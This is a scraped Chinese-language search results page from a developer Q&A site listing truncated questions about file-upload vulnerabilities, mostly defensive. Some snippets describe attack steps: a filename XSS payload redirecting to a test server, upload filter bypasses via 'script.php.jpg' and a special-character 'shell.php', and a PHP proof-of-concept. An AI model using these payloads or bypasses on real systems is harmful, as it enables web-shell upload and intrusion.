腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
2
回答
如何避免
文件
上传
函数中的路径或目录操作?
、
、
在我正在做的
文件
上传
功能中,一个重要的问题是我可以保存图像用户
上传
的路径。在下面的代码中,我已经在基于web的应用程序
文件
夹中指定了保存
上传
文件
的
文件
夹。我的指导员告诉我,在
asp
.net UploadFile控件的代码后面还有一个安全
漏洞
,我不知道为什么!= @"~\Images\"; string comPath = Server.MapPath(path + "\\" + FileUpl
浏览 4
提问于2013-03-20
得票数 2
1
回答
使用uploadify和
asp
.net mvc 2实现安全
上传
、
、
我有一个
asp
.net MVC2应用程序,我正在使用uploadify。我正在将
文件
直接
上传
到sql服务器数据库中。我需要做哪些必要的检查以及如何进行检查?我想执行防病毒扫描?这里可能存在哪些安全
漏洞
?
浏览 1
提问于2011-07-18
得票数 0
1
回答
asp
.net mvc
文件
上传
安全
漏洞
、
好了,除了检查
文件
类型和
文件
大小两个服务器端,我如何才能避免安全
漏洞
,在
上传
的
文件
,可能会危及我的系统(主要是从高级黑客)。这足够了吗?我不是在谈论任何特殊的场景,只是简单的
文件
上传
。
浏览 2
提问于2010-12-21
得票数 0
回答已采纳
1
回答
在
ASP
.NET核心中加密
文件
的“正确”方法是什么?
、
、
、
假设我们有一个要求,用户
上传
到我们的
ASP
.NET核心MVC应用程序的每个
文件
都必须以加密的形式存储在共享
文件
夹中,并且这些
文件
必须保留,直到用户删除它们(所以这可能需要很长时间)。共享
文件
夹部分并不难,但是加密
上传
文件
的“正确”方法是什么呢?当用户
上传
文件
时,我们得到的是一个包含原始
文件
名的字符串和一个包含
文件
内容的流,所以这是起点,但我不知道如何继续。有大量的Google结果,
浏览 23
提问于2021-01-28
得票数 2
1
回答
是否有权威的
漏洞
分类?
是否对
漏洞
进行了分类?但我没有找到权威的
漏洞
分类。在Web应用程序
漏洞
之下,应该有XSS/SSRF/XXE...。
浏览 0
提问于2020-09-09
得票数 0
回答已采纳
1
回答
PHP,它提供什么安全性?
、
如果我不能使用它(我做了
上传
,但不是通过帖子),所以我必须使用rename功能,我需要采取什么安全措施? 编辑 @Pekka要求我详细说明我打算如何
上传
该
文件
。我将通过Ajax
上传
文件
,并且我有一些用于
上传
倍数
文件
的队列功能。因此,我正在使用php://input流。如果我正确地理解了Pekka的答案,我就没有什么好担心的了,因为我将该
文件
作为一个流,并且我不会复制任何临时
文件
。如果我错了,请纠正我
浏览 0
提问于2012-08-12
得票数 1
回答已采纳
3
回答
使用SFTP在
ASP
.net MVC上直接
上传
到远程服务器是否可行?
、
、
我目前正在开发一些使用
asp
.net MVC,我仍然没有相当的经验,所以请帮助我。这个概念中是否存在安全
漏洞
? 非常感谢
浏览 4
提问于2009-10-31
得票数 0
回答已采纳
1
回答
允许ApplicationPoolIdentity写入访问web应用程序
文件
夹中的
文件
夹安全吗?
、
、
最近,我们实现了一个特性,它在我们的App_Themes
文件
夹中动态生成一个较少的
文件
。这是在应用程序启动时完成的。这要求我们授予@ApplicationPoolIdentity@ write对App_Themes
文件
夹的访问权限。
浏览 1
提问于2016-06-07
得票数 1
回答已采纳
3
回答
不使用/利用
文件
名中的XSS
、
、
我试图利用
文件
上传
的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证
上传
文件
的
文件
名,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名
文件
以包含类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
提问于2018-04-19
得票数 2
回答已采纳
1
回答
来自XSS的LFI还是RFI?
、
、
XSS能引导我们找到本地
文件
包含还是远程
文件
包含?我读过一篇文章,它可以通过XSS
漏洞
上传
shell,但我仍然不知道它是如何实现的。
浏览 0
提问于2012-06-06
得票数 1
回答已采纳
1
回答
最后带有特殊字符的PHP执行
、
、
我试图复制这个
漏洞
: 根据解释,可以绕过Wordpress插件中的检查,在php扩展后添加一个特殊的char。我正在尝试攻击,
文件
上传
时名为shell.php<special_char>,包含一个简单的php代码<?php echo "poc"; ?>。 然后,我应该在<target>/....在哪种情况下,可以利用允许
上传
扩展名为p
浏览 0
提问于2020-12-22
得票数 1
4
回答
ASP
.NET
文件
上载-动态
文件
名
、
、
我有一个网页,其中我有一个
ASP
.NET
文件
上传
控件从客户端机器
上传
文件
到Server.Now我想要
上传
n个times.Ex :我想从我的本地pc上载100个
文件
到server.The 100个
文件
名我可以从我的program.But中读取excel
文件
有没有办法将这个
文件
分配给
文件
上载控件?
浏览 2
提问于2009-02-12
得票数 1
回答已采纳
2
回答
在易受攻击的服务器上执行
上传
的php脚本,如果我知道它的位置?
、
、
我需要测试一个网站,我发现一个脆弱的
文件
上传
。只检查
文件
扩展名是.jpg、.png还是.pdf。我可以通过
上传
一个名为script.php.jpg的
文件
来绕过这个问题。我知道
上传
的
文件
存储在/uploads中。 我怎样才能执行那个脚本?在浏览器中键入http://example.com/uploads/script.php.jpg时,脚本不会执行。我知道服务器可以执行php代码,服务器有
文件
漏洞
浏览 0
提问于2018-06-24
得票数 1
2
回答
如何在服务器端网站(
asp
.net c# )中分配
文件
进行
文件
上传
、
、
、
我在我的
asp
.net网站上有一个异步
文件
上传
。我必须在
文件
上传
中显示一个
文件
名。我有一个编辑功能,它必须显示
上传
的
文件
在
文件
上传
的名称。我只想显示我在页面加载过程中拥有的
文件
名,如何在服务器端(c#)为
文件
上传
指定
文件
名,以及如何从服务器端更改
文件
上传
的背景颜色。<
asp
:AsyncF
浏览 2
提问于2012-01-20
得票数 0
1
回答
文件
上传
安全
漏洞
、
我的代码中有没有
文件
上传
的安全
漏洞
?我在我的服务器端使用apache。在php.ini
文件
中启用了
文件
上传
。 <?
浏览 5
提问于2012-01-07
得票数 0
回答已采纳
1
回答
laravel中的Ckeditor安全问题
、
、
我想问的是: 我用的是Laravel5.6和最后一个版本。
浏览 1
提问于2018-07-04
得票数 0
1
回答
multer的
上传
文件
漏洞
、
我正在使用multer在我的应用程序中
上传
文件
。我只想确认一下,是否存在
文件
易受攻击的风险?请发表意见。
浏览 19
提问于2019-12-26
得票数 4
1
回答
W3af vs手动渗透测试
与手动查找
漏洞
相比,w3af等工具在查找web应用程序
漏洞
方面的效率如何?他们是否能够找到OWASP前10名中的所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,仍然没有被发现?
浏览 0
提问于2014-11-27
得票数 0
3
回答
W3af和自动
漏洞
扫描器与手动测试
、
与手动查找
漏洞
相比,像w3af这样的工具在查找web应用程序
漏洞
方面有多有效?他们是否能够从OWASP前10名中找到所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,而仍未被发现?
浏览 0
提问于2014-11-27
得票数 3
2
回答
文件
上传
(哪种类型的
文件
)
、
、
、
当我学习关于
文件
上传
漏洞
的时候,一个问题浮现在我的脑海中。在搜索
文件
上载
漏洞
时使用哪种类型的
文件
?是否需要检测后端使用哪种编程语言?大多数示例中都使用Php扩展名
文件
。
浏览 0
提问于2022-05-17
得票数 1
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
文件上传漏洞
文件上传漏洞详解1
DVWA搭建与文件上传漏洞演示
从上传到入侵:揭秘文件上传漏洞的操作原理
QYKCMS后台任意文件上传、任意文件读取漏洞
热门
标签
更多标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
活动推荐
运营活动
广告
关闭
领券